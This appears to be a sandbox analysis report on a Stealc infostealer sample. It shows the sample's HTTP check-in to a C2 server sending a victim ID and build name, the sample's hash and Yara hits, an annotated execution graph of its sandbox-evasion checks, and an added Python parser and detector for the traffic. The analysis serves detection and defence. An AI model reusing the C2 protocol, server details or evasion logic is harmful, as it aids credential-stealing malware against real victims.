                              All traffic in this run is a single keep-alive TCP connection from 192.168.2.4:49730 to 185.215.113.37:80 carrying two HTTP requests; nothing follows the "block" reply apart from one last client packet about 2.3 seconds later.
                              • 185.215.113.37
                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                              0           192.168.2.4  49730        185.215.113.37  80                7628  C:\Users\user\Desktop\file.exe
                              Timestamp                             Bytes transferred  Direction  Data
                              Oct 25, 2024 00:19:16.339945078 CEST  89                 OUT
                              GET / HTTP/1.1
                              Host: 185.215.113.37
                              Connection: Keep-Alive
                              Cache-Control: no-cache

                              Oct 25, 2024 00:19:17.298089981 CEST  203                IN
                              HTTP/1.1 200 OK
                              Date: Thu, 24 Oct 2024 22:19:17 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8

                              Oct 25, 2024 00:19:17.300923109 CEST  412                OUT
                              POST /e2b1563c6670f193.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDA
                              Host: 185.215.113.37
                              Content-Length: 211
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 45 46 35 31 31 32 37 43 37 35 33 37 39 39 36 32 31 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 2d 2d 0d 0a
                              Data Ascii (decoded from the raw bytes above with the CRLF line breaks restored; the report's rendering ran the lines together):
                              ------EBKEHJJDAAAAKECBGHDA
                              Content-Disposition: form-data; name="hwid"

                              5FEF51127C753799621165
                              ------EBKEHJJDAAAAKECBGHDA
                              Content-Disposition: form-data; name="build"

                              doma
                              ------EBKEHJJDAAAAKECBGHDA--

                              Oct 25, 2024 00:19:17.598597050 CEST  210                IN
                              HTTP/1.1 200 OK
                              Date: Thu, 24 Oct 2024 22:19:17 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=
                              (base64; decodes to "block")

                              What the exchange shows: the bare GET / with no body is a reachability probe (the server answers with Content-Length: 0). The POST is the Stealc check-in, a two-field multipart form with the victim identifier (hwid = 5FEF51127C753799621165) and the campaign/build name (build = doma) sent to a PHP endpoint with a random-looking name; the declared Content-Length of 211 matches the decoded body byte for byte. The 8-byte reply is base64 for "block", which Stealc treats as an instruction to stop; consistently, no further request follows in this capture and the process exits, so this run never reaches the stealing or exfiltration stage. Usable network indicators from this exchange are the C2 address, the endpoint path, the hwid/build field pair, and the boundary shape (four dashes followed by 20 uppercase letters), which is what the Suricata rule above keyed on.
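The check-in above parsed programmatically, as an added example that is not Joe Sandbox or Stealc code: the body bytes are transcribed from the Data Raw hex dump of the POST, the multipart parser is a minimal splitter written for this page, and the boundary pattern used by looks_like_stealc_checkin (four dashes followed by exactly 20 uppercase letters) is an assumption generalized from this single capture, not a published rule.

```python
"""Parse the captured Stealc check-in and decode the C2 reply.
Added example, not Joe Sandbox or Stealc code."""
import base64
import re

# Transcribed from the "Data Raw" hex dump of the POST body above.
CHECKIN_BODY_HEX = """
2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61
74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a
35 46 45 46 35 31 31 32 37 43 37 35 33 37 39 39 36 32 31 31 36 35 0d 0a
2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61
74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a
64 6f 6d 61 0d 0a
2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 2d 2d 0d 0a
"""
CONTENT_TYPE = "multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDA"
CONTENT_LENGTH = 211                        # as declared in the request headers
REPLY_BODY_HEX = "59 6d 78 76 59 32 73 3d"  # the 8-byte body of the 200 OK

# Assumption generalized from this one capture, not a published rule:
# four dashes followed by 20 uppercase letters.
STEALC_BOUNDARY = re.compile(rb"^----[A-Z]{20}$")


def hexdump_to_bytes(dump):
    """Turn a whitespace-separated hex dump into bytes."""
    return bytes.fromhex("".join(dump.split()))


def boundary_from_content_type(content_type):
    """Extract the multipart boundary from a Content-Type header value."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if m is None:
        raise ValueError("no multipart boundary in Content-Type")
    return m.group(1).encode("ascii")


def parse_multipart(body, boundary):
    """Return {field name: value bytes} for a multipart/form-data body."""
    delimiter = b"--" + boundary
    fields = {}
    for part in body.split(delimiter)[1:]:   # [0] is the preamble, empty here
        if part.startswith(b"--"):           # closing delimiter "--boundary--"
            break
        if part.startswith(b"\r\n"):
            part = part[2:]
        headers, sep, value = part.partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("part without header/body separator")
        m = re.search(rb'name="([^"]*)"', headers)
        if m is None:
            continue                         # not a form field
        if value.endswith(b"\r\n"):          # CRLF that precedes the next delimiter
            value = value[:-2]
        fields[m.group(1).decode("ascii")] = value
    return fields


def decode_reply(raw):
    """C2 replies are base64 text; 'block' tells the client to stop."""
    return base64.b64decode(raw, validate=True).decode("ascii")


def looks_like_stealc_checkin(content_type, body):
    """Detection logic: Stealc-shaped boundary plus exactly the hwid/build fields."""
    try:
        boundary = boundary_from_content_type(content_type)
        fields = parse_multipart(body, boundary)
    except ValueError:
        return False
    return bool(STEALC_BOUNDARY.match(boundary)) and set(fields) == {"hwid", "build"}


if __name__ == "__main__":
    body = hexdump_to_bytes(CHECKIN_BODY_HEX)
    assert len(body) == CONTENT_LENGTH
    for name, value in parse_multipart(body, boundary_from_content_type(CONTENT_TYPE)).items():
        print(f"{name} = {value.decode()}")
    print("reply:", decode_reply(hexdump_to_bytes(REPLY_BODY_HEX)))
    print("stealc check-in:", looks_like_stealc_checkin(CONTENT_TYPE, body))
```

Run stand-alone it prints the two fields, the decoded reply "block" and True for the detection check. Matching on the boundary shape alone would also catch any client that happens to generate 20-letter boundaries, which is why the check additionally requires the exact hwid/build field set; both conditions are still only as reliable as the one sample they were derived from.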



                              Target ID:0
                              Start time:18:19:12
                              Start date:24/10/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0xd80000
                              File size:1'826'816 bytes
                              MD5 hash:4AF633CEED4AACAF057EA12772B50AD2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1754683786.00000000056C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true


                                Execution Graph

                                Execution Coverage: 7.5%
                                Dynamic/Decrypted Code Coverage: 0%
                                Signature Coverage: 10.1%
                                Total number of Nodes: 2000
                                Total number of Limit Nodes: 24

                                How to read the dump below: each node is written as "<node id> <code address> [<API calls made at that address, or 'N API calls' for a summarized subroutine>]" and each "<a>-><b>" is a control-flow edge between node ids. Following the edges from the start node 13549 (d969f0) gives the control flow up to the C2 contact:
                                • d82260 and d826a0: hundreds of successive calls into d845c0 (RtlAllocateHeap followed by VirtualProtect), i.e. per-string or per-block decryption into heap memory whose protection is then changed; this is what the unpacking and string-decryption signatures key on.
                                • d99860: GetPEB, then LoadLibraryA five times and a run of GetProcAddress calls. Imports are resolved at run time, which is why the static import table holds only kernel32!lstrcpy.
                                • d811d0 chain: GetSystemInfo, GetCurrentProcess + VirtualAllocExNuma, VirtualAlloc/VirtualFree, GlobalMemoryStatusEx (with __aulldiv), each with its own ExitProcess branch: CPU, NUMA and RAM checks that abort on a small analysis machine.
                                • d96770: GetUserDefaultLangID followed by five separate ExitProcess branches, the locale check reported as "Found evasive API chain (may stop execution after checking locale)".
                                • d97850 / d978e0: GetUserNameA and GetComputerNameA, with an ExitProcess branch at d811c4 that depends on the result.
                                • d96ac2: OpenEventA, then either CreateEventA (first instance) or CloseHandle + Sleep (an instance already exists): a single-instance check using a named event.
                                • d96920: GetSystemTime, sscanf, SystemTimeToFileTime twice and an ExitProcess branch at d969d8, consistent with an expiry-date check of the current time against a date string.
                                • d95b10 onward: lstrcpy/lstrcat string assembly, GetWindowsDirectoryA, then d84fb0 (GetProcessHeap, RtlAllocateHeap, InternetOpenA), which opens the WinINet session that produced the two HTTP requests captured above.
                                execution_graph 13549 d969f0 13594 d82260 13549->13594 13573 d96a64 13574 d9a9b0 4 API calls 13573->13574 13575 d96a6b 13574->13575 13576 d9a9b0 4 API calls 13575->13576 13577 d96a72 13576->13577 13578 d9a9b0 4 API calls 13577->13578 13579 d96a79 13578->13579 13580 d9a9b0 4 API calls 13579->13580 13581 d96a80 13580->13581 13746 d9a8a0 13581->13746 13583 d96a89 13584 d96b0c 13583->13584 13586 d96ac2 OpenEventA 13583->13586 13750 d96920 GetSystemTime 13584->13750 13589 d96ad9 13586->13589 13590 d96af5 CloseHandle Sleep 13586->13590 13593 d96ae1 CreateEventA 13589->13593 13592 d96b0a 13590->13592 13592->13583 13593->13584 13947 d845c0 13594->13947 13596 d82274 13597 d845c0 2 API calls 13596->13597 13598 d8228d 13597->13598 13599 d845c0 2 API calls 13598->13599 13600 d822a6 13599->13600 13601 d845c0 2 API calls 13600->13601 13602 d822bf 13601->13602 13603 d845c0 2 API calls 13602->13603 13604 d822d8 13603->13604 13605 d845c0 2 API calls 13604->13605 13606 d822f1 13605->13606 13607 d845c0 2 API calls 13606->13607 13608 d8230a 13607->13608 13609 d845c0 2 API calls 13608->13609 13610 d82323 13609->13610 13611 d845c0 2 API calls 13610->13611 13612 d8233c 13611->13612 13613 d845c0 2 API calls 13612->13613 13614 d82355 13613->13614 13615 d845c0 2 API calls 13614->13615 13616 d8236e 13615->13616 13617 d845c0 2 API calls 13616->13617 13618 d82387 13617->13618 13619 d845c0 2 API calls 13618->13619 13620 d823a0 13619->13620 13621 d845c0 2 API calls 13620->13621 13622 d823b9 13621->13622 13623 d845c0 2 API calls 13622->13623 13624 d823d2 13623->13624 13625 d845c0 2 API calls 13624->13625 13626 d823eb 13625->13626 13627 d845c0 2 API calls 13626->13627 13628 d82404 13627->13628 13629 d845c0 2 API calls 13628->13629 13630 d8241d 13629->13630 13631 d845c0 2 API calls 13630->13631 13632 d82436 13631->13632 13633 d845c0 2 API calls 13632->13633 13634 d8244f 13633->13634 13635 d845c0 2 API calls 13634->13635 13636 d82468 13635->13636 13637 d845c0 2 API 
calls 13636->13637 13638 d82481 13637->13638 13639 d845c0 2 API calls 13638->13639 13640 d8249a 13639->13640 13641 d845c0 2 API calls 13640->13641 13642 d824b3 13641->13642 13643 d845c0 2 API calls 13642->13643 13644 d824cc 13643->13644 13645 d845c0 2 API calls 13644->13645 13646 d824e5 13645->13646 13647 d845c0 2 API calls 13646->13647 13648 d824fe 13647->13648 13649 d845c0 2 API calls 13648->13649 13650 d82517 13649->13650 13651 d845c0 2 API calls 13650->13651 13652 d82530 13651->13652 13653 d845c0 2 API calls 13652->13653 13654 d82549 13653->13654 13655 d845c0 2 API calls 13654->13655 13656 d82562 13655->13656 13657 d845c0 2 API calls 13656->13657 13658 d8257b 13657->13658 13659 d845c0 2 API calls 13658->13659 13660 d82594 13659->13660 13661 d845c0 2 API calls 13660->13661 13662 d825ad 13661->13662 13663 d845c0 2 API calls 13662->13663 13664 d825c6 13663->13664 13665 d845c0 2 API calls 13664->13665 13666 d825df 13665->13666 13667 d845c0 2 API calls 13666->13667 13668 d825f8 13667->13668 13669 d845c0 2 API calls 13668->13669 13670 d82611 13669->13670 13671 d845c0 2 API calls 13670->13671 13672 d8262a 13671->13672 13673 d845c0 2 API calls 13672->13673 13674 d82643 13673->13674 13675 d845c0 2 API calls 13674->13675 13676 d8265c 13675->13676 13677 d845c0 2 API calls 13676->13677 13678 d82675 13677->13678 13679 d845c0 2 API calls 13678->13679 13680 d8268e 13679->13680 13681 d99860 13680->13681 13952 d99750 GetPEB 13681->13952 13683 d99868 13684 d99a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13683->13684 13687 d9987a 13683->13687 13685 d99b0d 13684->13685 13686 d99af4 GetProcAddress 13684->13686 13688 d99b46 13685->13688 13689 d99b16 GetProcAddress GetProcAddress 13685->13689 13686->13685 13690 d9988c 21 API calls 13687->13690 13691 d99b68 13688->13691 13692 d99b4f GetProcAddress 13688->13692 13689->13688 13690->13684 13693 d99b89 13691->13693 13694 d99b71 GetProcAddress 13691->13694 13692->13691 13695 d96a00 13693->13695 13696 d99b92 
GetProcAddress GetProcAddress 13693->13696 13694->13693 13697 d9a740 13695->13697 13696->13695 13698 d9a750 13697->13698 13699 d96a0d 13698->13699 13700 d9a77e lstrcpy 13698->13700 13701 d811d0 13699->13701 13700->13699 13702 d811e8 13701->13702 13703 d8120f ExitProcess 13702->13703 13704 d81217 13702->13704 13705 d81160 GetSystemInfo 13704->13705 13706 d8117c ExitProcess 13705->13706 13707 d81184 13705->13707 13708 d81110 GetCurrentProcess VirtualAllocExNuma 13707->13708 13709 d81149 13708->13709 13710 d81141 ExitProcess 13708->13710 13953 d810a0 VirtualAlloc 13709->13953 13713 d81220 13957 d989b0 13713->13957 13716 d8129a 13719 d96770 GetUserDefaultLangID 13716->13719 13717 d81249 __aulldiv 13717->13716 13718 d81292 ExitProcess 13717->13718 13720 d967d3 13719->13720 13721 d96792 13719->13721 13727 d81190 13720->13727 13721->13720 13722 d967cb ExitProcess 13721->13722 13723 d967ad ExitProcess 13721->13723 13724 d967c1 ExitProcess 13721->13724 13725 d967a3 ExitProcess 13721->13725 13726 d967b7 ExitProcess 13721->13726 13722->13720 13728 d978e0 3 API calls 13727->13728 13729 d8119e 13728->13729 13730 d811cc 13729->13730 13731 d97850 3 API calls 13729->13731 13734 d97850 GetProcessHeap RtlAllocateHeap GetUserNameA 13730->13734 13732 d811b7 13731->13732 13732->13730 13733 d811c4 ExitProcess 13732->13733 13735 d96a30 13734->13735 13736 d978e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13735->13736 13737 d96a43 13736->13737 13738 d9a9b0 13737->13738 13959 d9a710 13738->13959 13740 d9a9c1 lstrlen 13742 d9a9e0 13740->13742 13741 d9aa18 13960 d9a7a0 13741->13960 13742->13741 13744 d9a9fa lstrcpy lstrcat 13742->13744 13744->13741 13745 d9aa24 13745->13573 13748 d9a8bb 13746->13748 13747 d9a90b 13747->13583 13748->13747 13749 d9a8f9 lstrcpy 13748->13749 13749->13747 13964 d96820 13750->13964 13752 d9698e 13753 d96998 sscanf 13752->13753 13993 d9a800 13753->13993 13755 d969aa SystemTimeToFileTime SystemTimeToFileTime 13756 d969ce 13755->13756 13757 d969e0 13755->13757 
13756->13757 13758 d969d8 ExitProcess 13756->13758 13759 d95b10 13757->13759 13760 d95b1d 13759->13760 13761 d9a740 lstrcpy 13760->13761 13762 d95b2e 13761->13762 13995 d9a820 lstrlen 13762->13995 13765 d9a820 2 API calls 13766 d95b64 13765->13766 13767 d9a820 2 API calls 13766->13767 13768 d95b74 13767->13768 13999 d96430 13768->13999 13771 d9a820 2 API calls 13772 d95b93 13771->13772 13773 d9a820 2 API calls 13772->13773 13774 d95ba0 13773->13774 13775 d9a820 2 API calls 13774->13775 13776 d95bad 13775->13776 13777 d9a820 2 API calls 13776->13777 13778 d95bf9 13777->13778 14008 d826a0 13778->14008 13786 d95cc3 13787 d96430 lstrcpy 13786->13787 13788 d95cd5 13787->13788 13789 d9a7a0 lstrcpy 13788->13789 13790 d95cf2 13789->13790 13791 d9a9b0 4 API calls 13790->13791 13792 d95d0a 13791->13792 13793 d9a8a0 lstrcpy 13792->13793 13794 d95d16 13793->13794 13795 d9a9b0 4 API calls 13794->13795 13796 d95d3a 13795->13796 13797 d9a8a0 lstrcpy 13796->13797 13798 d95d46 13797->13798 13799 d9a9b0 4 API calls 13798->13799 13800 d95d6a 13799->13800 13801 d9a8a0 lstrcpy 13800->13801 13802 d95d76 13801->13802 13803 d9a740 lstrcpy 13802->13803 13804 d95d9e 13803->13804 14734 d97500 GetWindowsDirectoryA 13804->14734 13807 d9a7a0 lstrcpy 13808 d95db8 13807->13808 14744 d84880 13808->14744 13810 d95dbe 14889 d917a0 13810->14889 13812 d95dc6 13813 d9a740 lstrcpy 13812->13813 13814 d95de9 13813->13814 13815 d81590 lstrcpy 13814->13815 13816 d95dfd 13815->13816 14905 d85960 13816->14905 13818 d95e03 15049 d91050 13818->15049 13820 d95e0e 13821 d9a740 lstrcpy 13820->13821 13822 d95e32 13821->13822 13823 d81590 lstrcpy 13822->13823 13824 d95e46 13823->13824 13825 d85960 34 API calls 13824->13825 13826 d95e4c 13825->13826 15053 d90d90 13826->15053 13828 d95e57 13829 d9a740 lstrcpy 13828->13829 13830 d95e79 13829->13830 13831 d81590 lstrcpy 13830->13831 13832 d95e8d 13831->13832 13833 d85960 34 API calls 13832->13833 13834 d95e93 13833->13834 15060 d90f40 13834->15060 13836 d95e9e 13837 
d81590 lstrcpy 13836->13837 13838 d95eb5 13837->13838 15065 d91a10 13838->15065 13840 d95eba 13841 d9a740 lstrcpy 13840->13841 13842 d95ed6 13841->13842 15409 d84fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13842->15409 13844 d95edb 13845 d81590 lstrcpy 13844->13845 13846 d95f5b 13845->13846 15416 d90740 13846->15416 13848 d95f60 13849 d9a740 lstrcpy 13848->13849 13850 d95f86 13849->13850 13851 d81590 lstrcpy 13850->13851 13852 d95f9a 13851->13852 13853 d85960 34 API calls 13852->13853 13854 d95fa0 13853->13854 13948 d845d1 RtlAllocateHeap 13947->13948 13951 d84621 VirtualProtect 13948->13951 13951->13596 13952->13683 13955 d810c2 ctype 13953->13955 13954 d810fd 13954->13713 13955->13954 13956 d810e2 VirtualFree 13955->13956 13956->13954 13958 d81233 GlobalMemoryStatusEx 13957->13958 13958->13717 13959->13740 13961 d9a7c2 13960->13961 13962 d9a7ec 13961->13962 13963 d9a7da lstrcpy 13961->13963 13962->13745 13963->13962 13965 d9a740 lstrcpy 13964->13965 13966 d96833 13965->13966 13967 d9a9b0 4 API calls 13966->13967 13968 d96845 13967->13968 13969 d9a8a0 lstrcpy 13968->13969 13970 d9684e 13969->13970 13971 d9a9b0 4 API calls 13970->13971 13972 d96867 13971->13972 13973 d9a8a0 lstrcpy 13972->13973 13974 d96870 13973->13974 13975 d9a9b0 4 API calls 13974->13975 13976 d9688a 13975->13976 13977 d9a8a0 lstrcpy 13976->13977 13978 d96893 13977->13978 13979 d9a9b0 4 API calls 13978->13979 13980 d968ac 13979->13980 13981 d9a8a0 lstrcpy 13980->13981 13982 d968b5 13981->13982 13983 d9a9b0 4 API calls 13982->13983 13984 d968cf 13983->13984 13985 d9a8a0 lstrcpy 13984->13985 13986 d968d8 13985->13986 13987 d9a9b0 4 API calls 13986->13987 13988 d968f3 13987->13988 13989 d9a8a0 lstrcpy 13988->13989 13990 d968fc 13989->13990 13991 d9a7a0 lstrcpy 13990->13991 13992 d96910 13991->13992 13992->13752 13994 d9a812 13993->13994 13994->13755 13996 d9a83f 13995->13996 13997 d95b54 13996->13997 13998 d9a87b lstrcpy 13996->13998 13997->13765 13998->13997 14000 d9a8a0 lstrcpy 13999->14000 
14001 d96443 14000->14001 14002 d9a8a0 lstrcpy 14001->14002 14003 d96455 14002->14003 14004 d9a8a0 lstrcpy 14003->14004 14005 d96467 14004->14005 14006 d9a8a0 lstrcpy 14005->14006 14007 d95b86 14006->14007 14007->13771 14009 d845c0 2 API calls 14008->14009 14010 d826b4 14009->14010 14011 d845c0 2 API calls 14010->14011 14012 d826d7 14011->14012 14013 d845c0 2 API calls 14012->14013 14014 d826f0 14013->14014 14015 d845c0 2 API calls 14014->14015 14016 d82709 14015->14016 14017 d845c0 2 API calls 14016->14017 14018 d82736 14017->14018 14019 d845c0 2 API calls 14018->14019 14020 d8274f 14019->14020 14021 d845c0 2 API calls 14020->14021 14022 d82768 14021->14022 14023 d845c0 2 API calls 14022->14023 14024 d82795 14023->14024 14025 d845c0 2 API calls 14024->14025 14026 d827ae 14025->14026 14027 d845c0 2 API calls 14026->14027 14028 d827c7 14027->14028 14029 d845c0 2 API calls 14028->14029 14030 d827e0 14029->14030 14031 d845c0 2 API calls 14030->14031 14032 d827f9 14031->14032 14033 d845c0 2 API calls 14032->14033 14034 d82812 14033->14034 14035 d845c0 2 API calls 14034->14035 14036 d8282b 14035->14036 14037 d845c0 2 API calls 14036->14037 14038 d82844 14037->14038 14039 d845c0 2 API calls 14038->14039 14040 d8285d 14039->14040 14041 d845c0 2 API calls 14040->14041 14042 d82876 14041->14042 14043 d845c0 2 API calls 14042->14043 14044 d8288f 14043->14044 14045 d845c0 2 API calls 14044->14045 14046 d828a8 14045->14046 14047 d845c0 2 API calls 14046->14047 14048 d828c1 14047->14048 14049 d845c0 2 API calls 14048->14049 14050 d828da 14049->14050 14051 d845c0 2 API calls 14050->14051 14052 d828f3 14051->14052 14053 d845c0 2 API calls 14052->14053 14054 d8290c 14053->14054 14055 d845c0 2 API calls 14054->14055 14056 d82925 14055->14056 14057 d845c0 2 API calls 14056->14057 14058 d8293e 14057->14058 14059 d845c0 2 API calls 14058->14059 14060 d82957 14059->14060 14061 d845c0 2 API calls 14060->14061 14062 d82970 14061->14062 14063 d845c0 2 API calls 14062->14063 14064 d82989 
14063->14064 14065 d845c0 2 API calls 14064->14065 14066 d829a2 14065->14066 14067 d845c0 2 API calls 14066->14067 14068 d829bb 14067->14068 14069 d845c0 2 API calls 14068->14069 14070 d829d4 14069->14070 14071 d845c0 2 API calls 14070->14071 14072 d829ed 14071->14072 14073 d845c0 2 API calls 14072->14073 14074 d82a06 14073->14074 14075 d845c0 2 API calls 14074->14075 14076 d82a1f 14075->14076 14077 d845c0 2 API calls 14076->14077 14078 d82a38 14077->14078 14079 d845c0 2 API calls 14078->14079 14080 d82a51 14079->14080 14081 d845c0 2 API calls 14080->14081 14082 d82a6a 14081->14082 14083 d845c0 2 API calls 14082->14083 14084 d82a83 14083->14084 14085 d845c0 2 API calls 14084->14085 14086 d82a9c 14085->14086 14087 d845c0 2 API calls 14086->14087 14088 d82ab5 14087->14088 14089 d845c0 2 API calls 14088->14089 14090 d82ace 14089->14090 14091 d845c0 2 API calls 14090->14091 14092 d82ae7 14091->14092 14093 d845c0 2 API calls 14092->14093 14094 d82b00 14093->14094 14095 d845c0 2 API calls 14094->14095 14096 d82b19 14095->14096 14097 d845c0 2 API calls 14096->14097 14098 d82b32 14097->14098 14099 d845c0 2 API calls 14098->14099 14100 d82b4b 14099->14100 14101 d845c0 2 API calls 14100->14101 14102 d82b64 14101->14102 14103 d845c0 2 API calls 14102->14103 14104 d82b7d 14103->14104 14105 d845c0 2 API calls 14104->14105 14106 d82b96 14105->14106 14107 d845c0 2 API calls 14106->14107 14108 d82baf 14107->14108 14109 d845c0 2 API calls 14108->14109 14110 d82bc8 14109->14110 14111 d845c0 2 API calls 14110->14111 14112 d82be1 14111->14112 14113 d845c0 2 API calls 14112->14113 14114 d82bfa 14113->14114 14115 d845c0 2 API calls 14114->14115 14116 d82c13 14115->14116 14117 d845c0 2 API calls 14116->14117 14118 d82c2c 14117->14118 14119 d845c0 2 API calls 14118->14119 14120 d82c45 14119->14120 14121 d845c0 2 API calls 14120->14121 14122 d82c5e 14121->14122 14123 d845c0 2 API calls 14122->14123 14124 d82c77 14123->14124 14125 d845c0 2 API calls 14124->14125 14126 d82c90 14125->14126 
14127 d845c0 2 API calls 14126->14127 14128 d82ca9 14127->14128 14129 d845c0 2 API calls 14128->14129 14130 d82cc2 14129->14130 14131 d845c0 2 API calls 14130->14131 14132 d82cdb 14131->14132 14133 d845c0 2 API calls 14132->14133 14134 d82cf4 14133->14134 14135 d845c0 2 API calls 14134->14135 14136 d82d0d 14135->14136 14137 d845c0 2 API calls 14136->14137 14138 d82d26 14137->14138 14139 d845c0 2 API calls 14138->14139 14140 d82d3f 14139->14140 14141 d845c0 2 API calls 14140->14141 14142 d82d58 14141->14142 14143 d845c0 2 API calls 14142->14143 14144 d82d71 14143->14144 14145 d845c0 2 API calls 14144->14145 14146 d82d8a 14145->14146 14147 d845c0 2 API calls 14146->14147 14148 d82da3 14147->14148 14149 d845c0 2 API calls 14148->14149 14150 d82dbc 14149->14150 14151 d845c0 2 API calls 14150->14151 14152 d82dd5 14151->14152 14153 d845c0 2 API calls 14152->14153 14154 d82dee 14153->14154 14155 d845c0 2 API calls 14154->14155 14156 d82e07 14155->14156 14157 d845c0 2 API calls 14156->14157 14158 d82e20 14157->14158 14159 d845c0 2 API calls 14158->14159 14160 d82e39 14159->14160 14161 d845c0 2 API calls 14160->14161 14162 d82e52 14161->14162 14163 d845c0 2 API calls 14162->14163 14164 d82e6b 14163->14164 14165 d845c0 2 API calls 14164->14165 14166 d82e84 14165->14166 14167 d845c0 2 API calls 14166->14167 14168 d82e9d 14167->14168 14169 d845c0 2 API calls 14168->14169 14170 d82eb6 14169->14170 14171 d845c0 2 API calls 14170->14171 14172 d82ecf 14171->14172 14173 d845c0 2 API calls 14172->14173 14174 d82ee8 14173->14174 14175 d845c0 2 API calls 14174->14175 14176 d82f01 14175->14176 14177 d845c0 2 API calls 14176->14177 14178 d82f1a 14177->14178 14179 d845c0 2 API calls 14178->14179 14180 d82f33 14179->14180 14181 d845c0 2 API calls 14180->14181 14182 d82f4c 14181->14182 14183 d845c0 2 API calls 14182->14183 14184 d82f65 14183->14184 14185 d845c0 2 API calls 14184->14185 14186 d82f7e 14185->14186 14187 d845c0 2 API calls 14186->14187 14188 d82f97 14187->14188 14189 d845c0 2 
API calls 14188->14189 14190 d82fb0 14189->14190 14191 d845c0 2 API calls 14190->14191 14192 d82fc9 14191->14192 14193 d845c0 2 API calls 14192->14193 14194 d82fe2 14193->14194 14195 d845c0 2 API calls 14194->14195 14196 d82ffb 14195->14196 14197 d845c0 2 API calls 14196->14197 14198 d83014 14197->14198 14199 d845c0 2 API calls 14198->14199 14200 d8302d 14199->14200 14201 d845c0 2 API calls 14200->14201 14202 d83046 14201->14202 14203 d845c0 2 API calls 14202->14203 14204 d8305f 14203->14204 14205 d845c0 2 API calls 14204->14205 14206 d83078 14205->14206 14207 d845c0 2 API calls 14206->14207 14208 d83091 14207->14208 14209 d845c0 2 API calls 14208->14209 14210 d830aa 14209->14210 14211 d845c0 2 API calls 14210->14211 14212 d830c3 14211->14212 14213 d845c0 2 API calls 14212->14213 14214 d830dc 14213->14214 14215 d845c0 2 API calls 14214->14215 14216 d830f5 14215->14216 14217 d845c0 2 API calls 14216->14217 14218 d8310e 14217->14218 14219 d845c0 2 API calls 14218->14219 14220 d83127 14219->14220 14221 d845c0 2 API calls 14220->14221 14222 d83140 14221->14222 14223 d845c0 2 API calls 14222->14223 14224 d83159 14223->14224 14225 d845c0 2 API calls 14224->14225 14226 d83172 14225->14226 14227 d845c0 2 API calls 14226->14227 14228 d8318b 14227->14228 14229 d845c0 2 API calls 14228->14229 14230 d831a4 14229->14230 14231 d845c0 2 API calls 14230->14231 14232 d831bd 14231->14232 14233 d845c0 2 API calls 14232->14233 14234 d831d6 14233->14234 14235 d845c0 2 API calls 14234->14235 14236 d831ef 14235->14236 14237 d845c0 2 API calls 14236->14237 14238 d83208 14237->14238 14239 d845c0 2 API calls 14238->14239 14240 d83221 14239->14240 14241 d845c0 2 API calls 14240->14241 14242 d8323a 14241->14242 14243 d845c0 2 API calls 14242->14243 14244 d83253 14243->14244 14245 d845c0 2 API calls 14244->14245 14246 d8326c 14245->14246 14247 d845c0 2 API calls 14246->14247 14248 d83285 14247->14248 14249 d845c0 2 API calls 14248->14249 14250 d8329e 14249->14250 14251 d845c0 2 API calls 
